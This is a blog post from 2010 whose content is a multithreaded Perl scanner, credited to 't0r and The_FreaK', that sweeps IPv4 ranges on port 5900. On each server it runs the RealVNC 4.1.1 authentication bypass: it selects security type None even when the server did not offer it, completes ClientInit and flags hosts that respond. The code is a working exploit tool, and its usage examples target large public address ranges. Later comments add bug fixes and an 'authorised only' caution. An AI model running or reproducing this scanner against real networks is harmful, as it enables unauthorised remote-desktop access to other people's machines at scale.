Jumat, 12 Februari 2010

OpenVNC 4.11 Vulnerability Scanner — "OpenVNC 4.11" is presumably a typo for RealVNC 4.1.1. What the script below actually tests is whether a VNC server accepts security type 1 ("None") even when that type was not in the list the server offered, i.e. the authentication bypass associated with that release. Only run it against address space you are authorised to scan.

Code :
#!/bin/perl
use threads;
use threads::shared;
use IO::Select;          # per-read timeouts on the probe socket in scan()
use LWP::UserAgent;
require IO::Socket;
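# --- argument handling -------------------------------------------------------
#   vnc_scan.pl <start_ip> <end_ip> [threads] [timeout]
# Only scan address space you are authorised to test.
if (@ARGV < 2) { nxie(); exit(1); }
my $ip1     = $ARGV[0];         # first address of the range, dotted quad
my $ip2     = $ARGV[1];         # last address of the range, dotted quad
my $d       = $ARGV[2] || 45;   # maximum number of scan() threads in flight
my $timeout = $ARGV[3] || 1;    # seconds to wait for connect/data; raise on slow links

# Reject anything that is not four decimal octets in 0..255 before the values
# reach the address arithmetic of the main loop, where a malformed bound could
# make the scan run far past the intended range.
for my $addr ($ip1, $ip2) {
    my @octets = ($addr =~ /\A(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\z/);
    if (@octets != 4 || grep { $_ > 255 } @octets) {
        print STDERR "[-] '$addr' is not a dotted-quad IPv4 address\n";
        nxie();
        exit(1);
    }
}
if ($d !~ /\A\d+\z/ || $d < 1) {
    print STDERR "[-] threads must be a positive integer (got '$d')\n";
    exit(1);
}
if ($timeout !~ /\A\d+(?:\.\d+)?\z/ || $timeout <= 0) {
    print STDERR "[-] timeout must be a positive number of seconds (got '$timeout')\n";
    exit(1);
}

use constant VNC_PORT => 5900;  # RFB display :0

my $j    = 0;          # slot index into @thr, used by the main loop
my $host = ".....";    # last address that accepted a TCP connection, set by scan()

# Scratch variables for scan(). threads::shared is loaded but none of these is
# marked :shared, so every scan() thread works on its own copy.
my $sock;
my $proto_ver;
my $ignored;
my $auth_type;
my $sec_types;
my $vnc_data;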

print "[~] Scaning $h\n";
while($ip1 =~ m/(\d+)/igs)
{
push (@a1 , $1);
}
while($ip2 =~ m/(\d+)/igs)
{
push (@a2 , $1);
}
while (!($a1[0]==$a2[0] and $a1[1]==$a2[1] and $a1[2]==$a2[2] and $a1[3]==$a2[3]))
{
if($j>$d)
{
$j=0
};
$thr[$j]=threads->create(\&scan);

if($thr[$j]->tid()>$d)
{
threads->object( $thr[$j]->tid()-$d )->join;
}
$j++;
if($a1[3]==255)
{
$a1[3]=0;
$a1[2]++;
}
else
{
$a1[3]++;
}
if($a1[2]==255)
{
$a1[2]=0;
$a1[1]++;
}
if($a1[1]==255)
{
$a1[1]=0;
$a1[0]++;
}

}
foreach(threads->list) { $_->join }

print "[+] Scaning complete $h\n";

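# Read exactly $len bytes from $sock, waiting at most $timeout seconds whenever
# the socket has nothing buffered. Returns the bytes, or nothing on timeout,
# EOF or error. IO::Socket::INET's Timeout option only covers connect(); the
# original blocking read()s would park a scanner thread for good on a host
# that accepts the TCP connection and then stays silent.
sub read_exact {
    my ($sock, $len, $timeout) = @_;
    my $buf = '';
    my $sel = IO::Select->new($sock);
    while (length($buf) < $len) {
        return unless $sel->can_read($timeout);
        my $got = sysread($sock, $buf, $len - length($buf), length($buf));
        return unless $got;    # 0 = peer closed, undef = error
    }
    return $buf;
}

# Probe one host on VNC_PORT for the "security type None" authentication bypass.
#
# Runs in its own thread. The target is the optional first argument (dotted
# quad); without one the current value of @a1, which the main loop fills in
# before creating the thread, is used. Results go to STDOUT; nothing is
# returned.
#
# Handshake as implemented here (RFB 3.7/3.8 framing per RFC 6143, integers
# big-endian):
#   1. read the 12-byte "RFB xxx.yyy\n" banner and echo it back;
#   2. read u8 count, then that many u8 security types offered by the server;
#   3. ask for type 1 (None) whether or not it was offered;
#   4. read u32 SecurityResult (3.8 only; 3.7 sends none for type None),
#      0 = accepted;
#   5. send ClientInit and expect the start of ServerInit.
# A server that reaches step 5 without having offered type 1 exhibits the
# bypass. A server that did offer type 1 merely has no authentication
# configured; the original reported both as VULNERABLE, which is misleading for
# triage, so the two cases are now told apart in the output.
#
# Fixes over the original: it connected on $sock1 but read and wrote $sock
# (undefined, so every probe died in its thread), passed PeerAddr with a
# trailing space, ignored the $timeout argument, and unpacked the big-endian
# SecurityResult with the native-endian 'I' template.
sub scan {
    my ($target) = @_;
    $target = "$a1[0].$a1[1].$a1[2].$a1[3]"
        unless defined $target && length $target;
    print "[+] Trying: $target";

    my $sock = IO::Socket::INET->new(
        PeerAddr => $target,
        PeerPort => VNC_PORT,
        Proto    => 'tcp',
        Timeout  => $timeout,
    );
    unless ($sock) {
        print " : not vulnerable\n";
        return;
    }
    $host = $target;
    print " ----- ka porten 5900 hapur....\n";

    my $banner = read_exact($sock, 12, $timeout);
    unless (defined $banner && $banner =~ /\ARFB (\d{3})\.(\d{3})\n\z/) {
        print "$target : no RFB banner (not a VNC server, or it timed out)\n";
        close($sock);
        return;
    }
    my ($major, $minor) = ($1 + 0, $2 + 0);
    # RFB 3.3 servers send a single u32 security type instead of the list
    # parsed below; the parser would desynchronise, so they are not checked.
    if ($major < 3 || ($major == 3 && $minor < 7)) {
        print "$target : RFB $major.$minor, handshake not supported by this check\n";
        close($sock);
        return;
    }
    syswrite($sock, $banner);    # answer with the version the server offered

    my $count = read_exact($sock, 1, $timeout);
    unless (defined $count) {
        print "$target : no security-type list received\n";
        close($sock);
        return;
    }
    my $n_types = unpack('C', $count);
    # A count of 0 means the server refused the connection; a reason string
    # follows, and there is nothing to probe.
    if ($n_types == 0) {
        print "$target : not vulnerable, server rejected the connection\n";
        close($sock);
        return;
    }
    my $types = read_exact($sock, $n_types, $timeout);
    unless (defined $types) {
        print "$target : security-type list truncated\n";
        close($sock);
        return;
    }
    my %offered = map { $_ => 1 } unpack('C*', $types);

    syswrite($sock, "\x01");     # select security type 1 (None), offered or not

    if ($major > 3 || $minor >= 8) {
        my $result = read_exact($sock, 4, $timeout);
        if (!defined $result || unpack('N', $result)) {
            print "$target : not vulnerable refused to support authentication type.\n";
            close($sock);
            return;
        }
    }

    syswrite($sock, "\x01");     # ClientInit, shared-flag = 1
    my $server_init = read_exact($sock, 4, $timeout);   # framebuffer width, height
    if (defined $server_init && unpack('N', $server_init)) {
        chomp(my $version = $banner);
        if ($offered{1}) {
            print "$target : VULNERABLE! $version (security type None was offered: no authentication configured, not the bypass)\n";
        }
        else {
            print "$target : VULNERABLE! $version (security type None accepted although it was not offered)\n";
        }
    }
    else {
        print "$target : not vulnerable did not send data.\n";
    }
    close($sock);
    return;
}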
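# Print the banner and usage text to STDOUT. Called when the script is started
# with too few arguments; it does not exit by itself. The empty prototype of
# the original has been dropped (it only affected parsing, not validation).
sub nxie {
    print "\n==[ t0r and The_FreaK ]==\n\n";
    print "<=====================================================>\n";
    print " OpenVNC 4.11 authentication bypass scanner \n By The_FreaK and t0r\r\n";
    # The original usage line left out the two mandatory address arguments
    # that the argument check at the top of the script requires.
    print " Usage: vnc_scan.pl <start_ip> <end_ip> [threads] [timeout] \r\n";
    print " Ex: vnc_scan.pl 80.91.112.1 80.200.245.255 40 2 \r\n";
    print " vnc_scan.pl 80.91.112.1 80.200.245.255 \r\n";
    print "<=====================================================>\n";
    return;
}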

=============================================================================================
